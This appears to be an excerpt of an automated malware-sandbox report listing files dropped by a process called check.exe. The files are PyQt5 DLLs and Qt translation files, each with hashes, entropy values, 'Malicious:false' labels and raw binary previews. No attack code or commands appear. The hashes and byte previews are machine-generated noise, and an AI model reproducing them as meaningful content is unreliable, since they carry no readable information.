                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................a....s........s......s......s....>.........>......>.....>....>......>....Rich...................PE..d......_.........." .....B..........tH.......................................0......`q....`..........................................W..t....W..........@.......0H........... ......h...T.......................(.......0............`...............................text...[@.......B.................. ..`.rdata..J....`.......F..............@..@.data....'...........X..............@....pdata..0H.......J...\..............@..@.qtmetadv...........................@..P.rsrc...@...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\platforms\qminimal.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):844784
                                                                                                                                                                                                                                      Entropy (8bit):6.625808732261156
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:y6MhioHKQ1ra8HT+bkMY8zKI4kwU7dFOTTYfEWmTxbwTlWc:BMhioHKQp+bkjAjwGdFSZtbwBd
                                                                                                                                                                                                                                      MD5:2F6D88F8EC3047DEAF174002228219AB
                                                                                                                                                                                                                                      SHA1:EB7242BB0FE74EA78A17D39C76310A7CDD1603A8
                                                                                                                                                                                                                                      SHA-256:05D1E7364DD2A672DF3CA44DD6FD85BED3D3DC239DCFE29BFB464F10B4DAA628
                                                                                                                                                                                                                                      SHA-512:0A895BA11C81AF14B5BD1A04A450D6DCCA531063307C9EF076E9C47BD15F4438837C5D425CAEE2150F3259691F971D6EE61154748D06D29E4E77DA3110053B54
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#\..B2..B2..B2..:...B2..-3..B2.F....B2..-7..B2..-6..B2..-1..B2..)6..B2.^23..B2..)3..B2..B3.@2.^26..B2.^27..B2.^22..B2.^2...B2.^20..B2.Rich.B2.........PE..d...N._.........." ......................................................... ............`......................................... ...x.......@.......H....`..H.......................T.......................(.......0...............(............................text...;........................... ..`.rdata...C.......D..................@..@.data...H....@......."..............@....pdata..H....`.......0..............@..@.qtmetad............................@..P.rsrc...H...........................@..@.reloc..............................@..B................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\platforms\qoffscreen.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):754672
                                                                                                                                                                                                                                      Entropy (8bit):6.6323155845799695
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:/HpBmyVIRZ3Tck83vEgex5aebusGMIlhLfEWmpCJkl:/HpB63TckUcLaHMITAZmW
                                                                                                                                                                                                                                      MD5:6407499918557594916C6AB1FFEF1E99
                                                                                                                                                                                                                                      SHA1:5A57C6B3FFD51FC5688D5A28436AD2C2E70D3976
                                                                                                                                                                                                                                      SHA-256:54097626FAAE718A4BC8E436C85B4DED8F8FB7051B2B9563A29AEE4ED5C32B7B
                                                                                                                                                                                                                                      SHA-512:8E8ABB563A508E7E75241B9720A0E7AE9C1A59DD23788C74E4ED32A028721F56546792D6CCA326F3D6AA0A62FDEDC63BF41B8B74187215CD3B26439F40233F4D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m..T..KT..KT..K]t7K@..K.c.JV..K@g.JV..K.cKU..K.c.JA..K.c.J\..K.c.JP..K.|.JQ..KT..K...K.|.Js..K.|.JS..K.|.JU..K.|[KU..K.|.JU..KRichT..K........PE..d...R._.........." ................L.....................................................`.............................................x...8...........H....... s...h..........p.......T................... ...(.......0...............@............................text............................... ..`.rdata..............................@..@.data...............................@....pdata.. s.......t..................@..@.qtmetad.............T..............@..P.rsrc...H............V..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\platforms\qwebgl.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):482288
                                                                                                                                                                                                                                      Entropy (8bit):6.152380961313931
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:WO/vyK+DtyaHlIMDhg5WEOvAwKB2VaaHeqRw/yVfYu4UnCA6DEjeYchcD+1Zy2:bKtHOWg5OvAwK0NYu4AShcD+1U2
                                                                                                                                                                                                                                      MD5:1EDCB08C16D30516483A4CBB7D81E062
                                                                                                                                                                                                                                      SHA1:4760915F1B90194760100304B8469A3B2E97E2BC
                                                                                                                                                                                                                                      SHA-256:9C3B2FA2383EEED92BB5810BDCF893AE30FA654A30B453AB2E49A95E1CCF1631
                                                                                                                                                                                                                                      SHA-512:0A923495210B2DC6EB1ACEDAF76D57B07D72D56108FD718BD0368D2C2E78AE7AC848B90D90C8393320A3D800A38E87796965AFD84DA8C1DF6C6B244D533F0F39
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........gM..#...#...#..~....#.ei&...#.ei'...#.ei ...#..m'...#.ei"...#.(v"...#..m"...#..."...#.(v&...#.(v#...#.(v...#.(v!...#.Rich..#.................PE..d......_.........." .....R...........;....................................................`..........................................m..t...Dn..T.......@....@...=...@..............0...T.......................(.......0............p..(............................text...{Q.......R.................. ..`.rdata..:....p.......V..............@..@.data...H....0......................@....pdata...=...@...>..................@..@.qtmetadz............2..............@..P.rsrc...@............4..............@..@.reloc...............8..............@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\platforms\qwindows.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1477104
                                                                                                                                                                                                                                      Entropy (8bit):6.575113537540671
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24576:4mCSPJrAbXEEuV9Hw2SoYFo3HdxjEgqJkLdLu5qpmZuhg/A2b:nPlIEEuV9Hw2SFFWHdWZsdmqja/A2b
                                                                                                                                                                                                                                      MD5:4931FCD0E86C4D4F83128DC74E01EAAD
                                                                                                                                                                                                                                      SHA1:AC1D0242D36896D4DDA53B95812F11692E87D8DF
                                                                                                                                                                                                                                      SHA-256:3333BA244C97264E3BD19DB5953EFA80A6E47AACED9D337AC3287EC718162B85
                                                                                                                                                                                                                                      SHA-512:0396BCCDA43856950AFE4E7B16E0F95D4D48B87473DC90CF029E6DDFD0777E1192C307CFE424EAE6FB61C1B479F0BA1EF1E4269A69C843311A37252CF817D84D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......i...-...-...-...$.%.9.....q.,......8......%......)......+...9......9..,......)..........9..8...-..........d......,.....I.,......,...Rich-...........PE..d....._.........." .....,...h......4+..............................................n.....`.............................................x...(...........H............n..........X....r..T...................Pt..(... s..0............@...5...........................text..._+.......,.................. ..`.rdata.......@.......0..............@..@.data....m...@...D...(..............@....pdata...............l..............@..@.qtmetad.............J..............@..P.rsrc...H............L..............@..@.reloc..X............P..............@..B........................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):68592
                                                                                                                                                                                                                                      Entropy (8bit):6.125954940500008
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:Nt4B1RLj3S6TtH2sweUH+Hz6/4+D6VFsfvUfO:AB1RHFdoeUs6/4O6VFSZ
                                                                                                                                                                                                                                      MD5:F66F6E9EDA956F72E3BB113407035E61
                                                                                                                                                                                                                                      SHA1:97328524DA8E82F5F92878F1C0421B38ECEC1E6C
                                                                                                                                                                                                                                      SHA-256:E23FBC1BEC6CEEDFA9FD305606A460D9CAC5D43A66D19C0DE36E27632FDDD952
                                                                                                                                                                                                                                      SHA-512:7FF76E83C8D82016AB6BD349F10405F30DEEBE97E8347C6762EB71A40009F9A2978A0D8D0C054CF7A3D2D377563F6A21B97DDEFD50A9AC932D43CC124D7C4918
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o...o...o...f...k......m...{..m......~......h......m......h...o..........k......n.....~.n......n...Richo...........................PE..d...V._.........." .....z...t......T........................................@.......b....`......................................... ................ ..X....................0..4.......T.......................(...p...0...............x............................text....y.......z.................. ..`.rdata...Z.......\...~..............@..@.data...............................@....pdata..............................@..@.qtmetad............................@..P.rsrc...X.... ......................@..@.reloc..4....0......................@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):144368
                                                                                                                                                                                                                                      Entropy (8bit):6.294675868932723
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:rrjwZ43rCOtrBk7wcR0l7wBlaL6BtIEt51T0Nhkqg8FoQY:7hZu9R0l7wFBtIEt51T0Nuqg8JY
                                                                                                                                                                                                                                      MD5:53A85F51054B7D58D8AD7C36975ACB96
                                                                                                                                                                                                                                      SHA1:893A757CA01472A96FB913D436AA9F8CFB2A297F
                                                                                                                                                                                                                                      SHA-256:D9B21182952682FE7BA63AF1DF24E23ACE592C35B3F31ECEEF9F0EABEB5881B9
                                                                                                                                                                                                                                      SHA-512:35957964213B41F1F21B860B03458404FBF11DAF03D102FBEA8C2B2F249050CEFBB348EDC3F22D8ECC3CB8ABFDC44215C2DC9DA029B4F93A7F40197BD0C16960
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......R._...1]..1]..1]..]..1]..0\..1]..5\..1]..2\..1]..4\..1]..0\..1]..0\..1]..0]..1]..4\..1]..1\..1]...]..1]..3\..1]Rich..1]........................PE..d...`._.........." .....\...........`.......................................`......wJ....`................................................. ........@..X.... ...............P.........T...................`...(...0...0............p...............................text....Z.......\.................. ..`.rdata......p.......`..............@..@.data...............................@....pdata....... ......................@..@.qtmetadm....0......................@..P.rsrc...X....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_ar.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):130
                                                                                                                                                                                                                                      Entropy (8bit):4.024232093209084
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/2/vlAlHekW3/S1MUe3/CLlI+rwtbWlMrNtYs8ar/u:Cwm+/PtUePCRIRt6Ygs8y/u
                                                                                                                                                                                                                                      MD5:8FF05B56C0995F90A80B7064AA6E915C
                                                                                                                                                                                                                                      SHA1:D5AEB09AE557CEEFB758972EC4AC624CDDC9E6A7
                                                                                                                                                                                                                                      SHA-256:A8A1B0D6F958E7366D1C856BE61000106D3E7FC993FB931675369892B9002D0B
                                                                                                                                                                                                                                      SHA-512:5374E0F1D3F5A6A456B00732DE8005787B17ECEF9C8A2B2C1228966A6A8DE211700334D8FD789DAD269F52D0AEED3F5160010CA60909861E270C253B3EA881A4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ar....R.....q.t.b.a.s.e._.a.r.....q.t.s.c.r.i.p.t._.a.r.....q.t.m.u.l.t.i.m.e.d.i.a._.a.r..............$...*.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_bg.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.6813848812976975
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/6lLlAlHekVYtzlY1MUdI7lULlI+rwtbWlMoIFl8IPldkO4t/z:CwDC+7tJjUWhURIRt68f8oiP1z
                                                                                                                                                                                                                                      MD5:466EED6C184D2055488D4C5EA9AE5F20
                                                                                                                                                                                                                                      SHA1:8599AB9B731BFC84F6EEC7A0129F396FB8FEC4EA
                                                                                                                                                                                                                                      SHA-256:9E1CE4D91852352043D9191F1A992838F919CBA7E2F2D9BB1161E494E8BF5F5E
                                                                                                                                                                                                                                      SHA-512:D2462951EC7DCE3D0851AE9C4ED644FFE0D2A5BDD15B4AE1A4295C187B4295BC854D6A5038DAC0564D165463419D615EB6CE7A9760CEFAD71AB673FB2109C349
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......bg....v.....q.t.b.a.s.e._.b.g.....q.t.s.c.r.i.p.t._.b.g.....q.t.m.u.l.t.i.m.e.d.i.a._.b.g... .q.t.x.m.l.p.a.t.t.e.r.n.s._.b.g.......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_ca.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.631479835393124
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/NVl/lAlHekUOplY1MUce/hlAlI+rwtbWlMpOflUlIPldkOHlz:CwO4+94jUcerAIRt6a6Uloi8
                                                                                                                                                                                                                                      MD5:6FBA66FE449866B478A2EBA66A724A02
                                                                                                                                                                                                                                      SHA1:EBEF6ED8460218CE8DF735659A8CBCD693600AC6
                                                                                                                                                                                                                                      SHA-256:171C7424B24D8502AB53CB3784FF34D8FCFAE26557CF8AF4DFDDEC6485ACC2FE
                                                                                                                                                                                                                                      SHA-512:2D2438738C6D10D8A53B46DE5A94BBF993818D080F344D9F1B94FC83D60335D9A5E8EFCC297D593FFF1D427972F9F9502FC31C332CAEA579FC7A88487390457E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ca....v.....q.t.b.a.s.e._.c.a.....q.t.s.c.r.i.p.t._.c.a.....q.t.m.u.l.t.i.m.e.d.i.a._.c.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.a.......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_cs.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):157
                                                                                                                                                                                                                                      Entropy (8bit):3.7483537099309427
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/fVFlAlHekUsplY1MUcM/hlULlI+rwtbWlMpsfl8IPldkO1lPchn:CwY4+9ujUcMrURIRt6aE8oinh
                                                                                                                                                                                                                                      MD5:D033053C03C3ECFA2AA926E0E674F67F
                                                                                                                                                                                                                                      SHA1:B4E95F8278121E2549F8BB6B5DAF1496F1738A7D
                                                                                                                                                                                                                                      SHA-256:3C0CBFD19490D67D1B3B9E944C3A4D9A9E7F87D7AE35E88D5D5A0077349B5B21
                                                                                                                                                                                                                                      SHA-512:2C7E9E9DBE0B25FBA94A52FE4BCCB1D9FED2A7BD2877DB91F82546C3BC8606280949594227BA0FC1C74C31010E1F573B3A82852BE746EAA4F397140485789136
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......cs....v.....q.t.b.a.s.e._.c.s.....q.t.s.c.r.i.p.t._.c.s.....q.t.m.u.l.t.i.m.e.d.i.a._.c.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.s...........

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_da.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.6174817344122334
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/4Jlr/lAlHekT6hY1MUb6JAlI+rwtbWlMuel3UlIPldkOQtt:Cw7rC+3jUkAIRt6EVUloi9
                                                                                                                                                                                                                                      MD5:E6A683F4A0883B5B0C7D30B847EF208C
                                                                                                                                                                                                                                      SHA1:FF2440DBBFE04AD86C6F285426AAFD49A895B128
                                                                                                                                                                                                                                      SHA-256:B5036161CE808C728E5FDA985F792DB565831FD01CF00B282547790C037353A2
                                                                                                                                                                                                                                      SHA-512:D73B794A71DFD3A3C06BF43ED109F635B4960F9A3904FB728873AB5251BDF6A791DDFDEBA884A2703A35461E18BA902804095AC4B92A2C9361526469B6D35FFA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......da....v.....q.t.b.a.s.e._.d.a.....q.t.s.c.r.i.p.t._.d.a.....q.t.m.u.l.t.i.m.e.d.i.a._.d.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.a.......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_de.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.6174817344122334
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/8rJFlAlHekTul01MUbul4LlI+rwtbWlMuallyIPldkOknt:Cw/rJ4+XU5RIRt6Aaoi7t
                                                                                                                                                                                                                                      MD5:06168E1261BF72F49F94927723B2E1EB
                                                                                                                                                                                                                                      SHA1:DEAF1B53C3FEE6CB28840418D0060AFA4D59D3FC
                                                                                                                                                                                                                                      SHA-256:5805B8FF3747849794E2D70661D737C69C15F1AE763C38E17084B1E5A81E9153
                                                                                                                                                                                                                                      SHA-512:AA3915C029C74DC270514C7F50E8BEC06C825F278E0DE0477AD8ED3187700BBD7711382A6E47C3AC76AC756CEFF9FA8CDD4E9B9DAC817475BC122F78B02C7D7D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......de....v.....q.t.b.a.s.e._.d.e.....q.t.s.c.r.i.p.t._.d.e.....q.t.m.u.l.t.i.m.e.d.i.a._.d.e... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.e.......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_en.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                      Entropy (8bit):4.0
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                                                      MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                                                      SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                                                      SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                                                      SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`...

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_es.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.6070658648473097
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/7lJFlAlHekSMthULlI+rwtbWlMvEJY1MUaEf8IPldkOzvt:CwElJ4+7MrURIRt6cujUaE8oi0F
                                                                                                                                                                                                                                      MD5:EE47DFADBA4414FDC051C5CFBE71DDC1
                                                                                                                                                                                                                                      SHA1:DE650E96A9C130D35F8A498202773EF7FC875D27
                                                                                                                                                                                                                                      SHA-256:E25E43F046F61022FFE871A2F73C6A12EDFC5C3EFD958C0E019A721860A053B0
                                                                                                                                                                                                                                      SHA-512:8C1D8901D2F66CCBF947B831858E08B703517470B2B813B241E00162A275AC9103FF5B9251AD39BD53551E0A4FB45EE74187B218A1EF7C6CF6C5FA9F9219AE04
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......es....v.....q.t.b.a.s.e._.e.s.....q.t.m.u.l.t.i.m.e.d.i.a._.e.s.....q.t.s.c.r.i.p.t._.e.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.e.s.......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_fa.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):293121
                                                                                                                                                                                                                                      Entropy (8bit):5.272179385890926
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:gEo2cQbzaVmvGQYkHkMRKkNeGr+0BhaRsLAChY21rpnLqL9ytnvC58gypn4l4qF:gEZbza0HjeGrxBhaCLFC
                                                                                                                                                                                                                                      MD5:F9C3624197ACB30A9E6CC799BB65BED6
                                                                                                                                                                                                                                      SHA1:D715EAE24387DE15588F68C92991A93FAFB5EEAB
                                                                                                                                                                                                                                      SHA-256:B292AFB0763B8C7C30A5AF7372BFC12D8A0D00BF3DD4A000715D9F576D9C1A39
                                                                                                                                                                                                                                      SHA-512:199C107AE7EAFCF2A5EEC149CAFEE7ED09B938E204B56AD3AAC9568D27166F61EC8E2225A11AF26F7E1F035FB5CAD98621A01E8A9942D18C273F43B90201162A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......faB..I....*...u...+...............@.......A...J...B.......C...X...D.......E.......F...%...G.......H...0...I.......P...v...Q.......R.......S.......T..."...U.......V...h...W.......X...s...Y.......]..e....t...................-.......W.......|.......i...;..Eu...;..Z....;...]...;..c....;.......;..0]...M..f....O.......O..2.......#....}..f=...m..fg.........(5......+;..1a..+;...V..+;...!..+O..17..+O...(..1.......E@......F....u..H4......HY...Y..H....S..I....5..I@.....IA......IC......J...1...J.......J.......J...|...K...6...LD......L.......PS......R....Z..T.......Zr.. ...[`...O..[`......\...%@..\...2..._...&l.._...38..1........E..........2u..........1.......1...........@......4G...........................$...L...$..xY...[.......,...u...y...y...y..z.......F.......<.......g.......5W...........9...........f...E...U...E../....E..................0-...%..6....%.........................3......f..........5...?...0..EK...0......0..L ...0..c....0.......0...Z...5...........Y.. D

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_fi.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):117
                                                                                                                                                                                                                                      Entropy (8bit):3.739162292019161
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/4HlAlHekRgOp1MUZWJKlI+rwtbWlMsIkk:Cwxe++IUocIRt6Qkk
                                                                                                                                                                                                                                      MD5:72882942B07B8AAC98034016E752B1A0
                                                                                                                                                                                                                                      SHA1:BF23B4C136B863B10E770019A2DF62FC988859DF
                                                                                                                                                                                                                                      SHA-256:048CA42DCE4FAF5FC21D843576E3C6FD963146ECC78554E7E5F34D07F64FB213
                                                                                                                                                                                                                                      SHA-512:403E7F4E9A0E44F2118804F0781A18EB1852797825498751E3AFA02D9558D90293ABDB570786CED80F7EFF800BEF6D9444A72E6A640D331DA46B2A0EA43C8E96
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......fi....R.....q.t.b.a.s.e._.f.i.....q.t.s.c.r.i.p.t._.f.i.....q.t.m.u.l.t.i.m.e.d.i.a._.f.i.......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_fr.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.680458675741643
                                                                                                                                                                                                                                      Encrypted:false
